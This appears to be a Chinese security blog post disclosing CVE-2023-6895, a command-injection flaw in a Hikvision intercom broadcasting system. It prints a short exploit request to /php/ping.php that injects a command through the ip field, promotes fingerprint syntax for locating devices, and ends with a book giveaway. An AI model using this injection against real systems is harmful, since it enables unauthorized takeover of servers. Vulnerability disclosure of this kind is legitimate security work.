文末抽奖 | CVE-2023-6895 某康RCE漏洞（附EXP） - 新鲜讯息

声明：该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送，建议大家把阿无安全“设为星标”，否则可能看不到了！

0x01 前言

海康威视Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞，攻击者能够利用该漏洞获取服务器权限，导致服务器沦陷。

0x02 漏洞影响

影响版本

海康威视IP网络对讲广播系统 v3.0.3_20201113_RELEASE

0x03 漏洞利用

登录界面

EXP如下：

POST /php/ping.php HTTP/1.1
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping 8.8.8.8

success！

0x04 修复方案

请升级最新版本。

0x05 下载地址

点击下方名片进入公众号

回复【6895】获取指纹语法

赠书福利

一：企业信息安全体系建设之道

本书内容来源于网商银行在信息安全方面的一线实战经验，主要介绍网商银行作为一家数字化银行如何进行网络信息安全体系建设，覆盖的安全子领域包括：基础设施安全、业务应用安全、数据安全、威胁感知、红蓝演练等。

本书的内容总体分为六个部分：第一部分介绍数字银行安全体系建设的整体架构与方法论，第二部分介绍默认安全机制，讲述如何有效控制所有已知类型的安全风险，第三部分介绍可信纵深防御体系，讲述如何应对未知类型的安全风险和高级威胁，第四部分介绍威胁感知与响应体系，讲述对于可能发生的威胁如何有效感知和处置，第五部分介绍实战检验，通过实战攻防演习的方式讲述如何检验安全体系的有效性和安全水位，第六部分介绍安全数智化，讲述如何通过数字化、自动化、智能化实现安全工作的有效开展。

宠粉们福利，会有5 本书籍免费赠送。

规则如下：

1. 本文末点‘在看’给个支持的动力就可以，不需要转发朋友圈！！

2. 私聊下面公众号发送“抽奖”即可扫描参与抽奖，注意看是发送暗号“抽奖”。

3. 活动截止时间为1月10日 18:00点，到时候还要中奖者及时联系号主发送你的中奖核验二维码、收货地址、姓名、手机号以及想要的书籍，好给您发送书籍哦！24小时内未联系号主视为自动放弃！骗书行为出版社会永久拉黑！

往期推荐 · 值得阅看